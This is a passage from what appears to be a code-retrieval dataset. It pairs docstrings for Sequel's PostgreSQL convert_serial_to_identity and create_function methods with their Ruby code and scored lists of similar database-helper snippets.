    raise Error, "could not determine column to convert from serial to identity automatically"
  end
  column = im.call(column)

  column_num = ds.from(:pg_attribute).
    where(:attrelid=>table_oid, :attname=>column).
    get(:attnum)

  pg_class = Sequel.cast('pg_class', :regclass)

  # Find the sequence linked to the column. deptype 'a' marks a serial
  # column's sequence; deptype 'i' means it is already an identity column.
  res = ds.from(:pg_depend).
    where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').
    select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])

  case res.length
  when 0
    raise Error, "unable to find related sequence when converting serial to identity"
  when 1
    seq_oid, already_identity = res.first
  else
    raise Error, "more than one linked sequence found when converting serial to identity"
  end

  return if already_identity

  transaction(server_hash) do
    # Drop the serial default, then flip the system catalog entries so the
    # existing sequence is treated as the column's identity sequence.
    run("ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT", server_hash)
    ds.from(:pg_depend).
      where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').
      update(:deptype=>'i')
    ds.from(:pg_attribute).
      where(:attrelid=>table_oid, :attname=>column).
      update(:attidentity=>'d')
  end

  remove_cached_schema(table)
  nil
end
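
A minimal usage sketch, assuming a Sequel connection made as a superuser to PostgreSQL 10.2+; the connection URL, table names, column name, and shard name here are hypothetical, not part of the original row:

```ruby
require 'sequel'

# Hypothetical connection; must be a superuser on PostgreSQL 10.2+.
DB = Sequel.connect('postgres://postgres@localhost/app_db')

# Convert the first auto-incrementing primary key column of :items.
DB.convert_serial_to_identity(:items)

# Convert an explicitly named column, running against a specific shard.
DB.convert_serial_to_identity(:audit_logs, column: :log_id, server: :shard1)
```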
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_to_uuid(table, options = {})\n default = options[:default] || 'gen_random_uuid()'\n seed = options[:seed]\n\n column = connection.primary_key(table)\n\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} DROP DEFAULT,\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)}),\n ALTER COLUMN #{column} SET DEFAULT #{default}}\n\n execute %Q{DROP SEQUENCE IF EXISTS #{table}_#{column}_seq} rescue nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def serial_primary_key_options\n # :nocov:\n auto_increment_key = server_version >= 100002 ? :identity : :serial\n # :nocov:\n {:primary_key => true, auto_increment_key => true, :type=>Integer}\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def serial_primary_key_options\n {:primary_key => true, :serial => true, :type=>Integer}\n end",
"def import_columns( table )\n schema = db.schema( table.name )\n\n # Get info about primary key columns.\n\n primary_key_columns = schema.select{ |name, opts| opts[ :primary_key ] }\n\n multi_primary_key = ( primary_key_columns.count > 1 )\n\n # Import each column in sequence.\n\n for name, opts in schema\n\n # Import column type and options.\n\n type, opts = import_column_type_and_options( opts )\n\n # Deal with primary keys, which is a bit obscure because of the auto-increment handling.\n\n primary_key = opts.delete( :primary_key )\n auto_increment = opts.delete( :auto_increment )\n\n if primary_key && ! multi_primary_key\n if auto_increment\n opts.delete( :default ) if opts[ :default ].to_s =~ /\\Anextval/\n table.add_column( :primary_key, name, opts.merge( :type => type ) )\n next\n end\n opts[ :primary_key ] = primary_key\n end\n\n table.add_column( type, name, opts )\n end\n\n # Define multi-column primary key if necessary.\n # Note that Sequel currently doesn't preserve the primary key order, so neither can we.\n\n if multi_primary_key\n table.add_column( :primary_key, primary_key_columns.map{ |name, opts| name } )\n end\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def primary_key\n fail NotImplementedError\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def assign_objectid_primary_key\n self.class.objectid_columns_manager.assign_objectid_primary_key(self)\n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def primary_key_columns\n @columns.values.find_all { |c| c.primary_key? }\n end",
"def primary_key=(value)\n @primary_key = value && value.to_s\n @quoted_primary_key = nil\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def primary_key\n 'id'\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def orchestrate_primary_key\n id\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def primary_key\n self.class.primary_key == :id ? id : @saved_attributes[self.class.primary_key]\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
"def id_column\n IdMethods::ID_COLUMN\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def set_primary_key_attribute\n base = {}\n base[primary_key] = id\n\n attributes.update(base)\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def original_primary_key\n if sourceRD.naturalKey == \"id\"\n \"original_id\"\n else\n sourceRD.naturalKey\n end\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n @connection.do(enable_identity_insert(@iiTable, true))\n @iiEnabled = true\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def supports_primary_key?\n true\n end",
"def column_to_uuid(table, column, seed: nil)\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)})}\n end",
"def primary_key\n '_id'\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def primary_key\n self[:primary_key]\n end",
"def primary_key?\n self.primary_key\n end",
"def supports_primary_key?\n true\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def primary_key\n send( self.class.primary_key )\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def schema_autoincrementing_primary_key?(schema)\n !!(schema[:primary_key] && schema[:auto_increment])\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def to_param\n self.primary_key\n end",
"def load_identity!\n row_size.times do |r|\n column_size.times do |c|\n self[r, c] = (r == c ? 1 : 0)\n end\n end\n self\n end"
] |
[
"0.6523442",
"0.6269975",
"0.6269304",
"0.6203986",
"0.6120233",
"0.6039965",
"0.60150903",
"0.5958063",
"0.5902873",
"0.58989686",
"0.5894372",
"0.58397007",
"0.5799071",
"0.57580894",
"0.57580894",
"0.5664597",
"0.5664597",
"0.56134826",
"0.56110376",
"0.56110376",
"0.5605405",
"0.5591472",
"0.5589769",
"0.5589769",
"0.556074",
"0.55508524",
"0.5539416",
"0.55338204",
"0.5532486",
"0.5531547",
"0.5500956",
"0.5500956",
"0.5478583",
"0.5451131",
"0.54497653",
"0.54343987",
"0.5425353",
"0.5401119",
"0.5398729",
"0.5388007",
"0.5385998",
"0.5383397",
"0.53417623",
"0.5334881",
"0.5334881",
"0.5321254",
"0.5321254",
"0.53120077",
"0.5310239",
"0.53057885",
"0.53054994",
"0.530493",
"0.53021187",
"0.53021187",
"0.5297121",
"0.5296898",
"0.5294893",
"0.52792466",
"0.52760357",
"0.5274096",
"0.52474475",
"0.523048",
"0.51952076",
"0.51894295",
"0.51848155",
"0.51679045",
"0.5164736",
"0.5155622",
"0.51536095",
"0.5143092",
"0.51411384",
"0.5116889",
"0.51058114",
"0.51057315",
"0.510089",
"0.5096143",
"0.5096143",
"0.5096143",
"0.5095803",
"0.5084646",
"0.5082579",
"0.5076248",
"0.5065557",
"0.5057834",
"0.50451666",
"0.5033326",
"0.5028007",
"0.50272113",
"0.5015421",
"0.50030625",
"0.5002954",
"0.49982563",
"0.4995023",
"0.49671343",
"0.49604118",
"0.49577758",
"0.4943872",
"0.49395725",
"0.49350172",
"0.49332416"
] |
0.8096805
|
0
|
Creates the function in the database.

Arguments:
name :: name of the function to create
definition :: string definition of the function, or object file for a dynamically loaded C function.
opts :: options hash:
        :args :: function arguments, can be either a symbol or string specifying a type, or an array of 1-3 elements:
                 1 :: argument data type
                 2 :: argument name
                 3 :: argument mode (e.g. in, out, inout)
        :behavior :: Should be IMMUTABLE, STABLE, or VOLATILE. PostgreSQL assumes VOLATILE by default.
        :parallel :: The thread safety attribute of the function. Should be SAFE, UNSAFE, or RESTRICTED. PostgreSQL assumes UNSAFE by default.
        :cost :: The estimated cost of the function, used by the query planner.
        :language :: The language the function uses. SQL is the default.
        :link_symbol :: For a dynamically loaded C function, the function's link symbol if different from the definition argument.
        :returns :: The data type returned by the function. If you are using OUT or INOUT argument modes, this is ignored. Otherwise, if this is not specified, void is used by default to specify the function is not supposed to return a value.
        :rows :: The estimated number of rows the function will return. Only use if the function returns SETOF something.
        :security_definer :: Makes the privileges of the function the same as the privileges of the user who defined the function, instead of the privileges of the user who runs the function. There are security implications when doing this; see the PostgreSQL documentation.
        :set :: Configuration variables to set while the function is being run, can be a hash or an array of two pairs. search_path is often used here if :security_definer is used.
        :strict :: Makes the function return NULL when any argument is NULL.
|
def create_function(name, definition, opts=OPTS)
  self << create_function_sql(name, definition, opts)
end
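
A hedged usage sketch exercising the options documented above; the function name and body are invented for illustration:

```ruby
# Hypothetical example: a strict, immutable SQL function adding two integers.
DB.create_function(:add_ints, 'SELECT $1 + $2',
  args: [:integer, :integer], # or [[:integer, :a], [:integer, :b]] to name them
  returns: :integer,
  language: :sql,
  behavior: :immutable,
  strict: true)

# This generates and runs SQL along the lines of:
#   CREATE FUNCTION add_ints(integer, integer) RETURNS integer
#   LANGUAGE sql IMMUTABLE STRICT AS 'SELECT $1 + $2'
```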
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
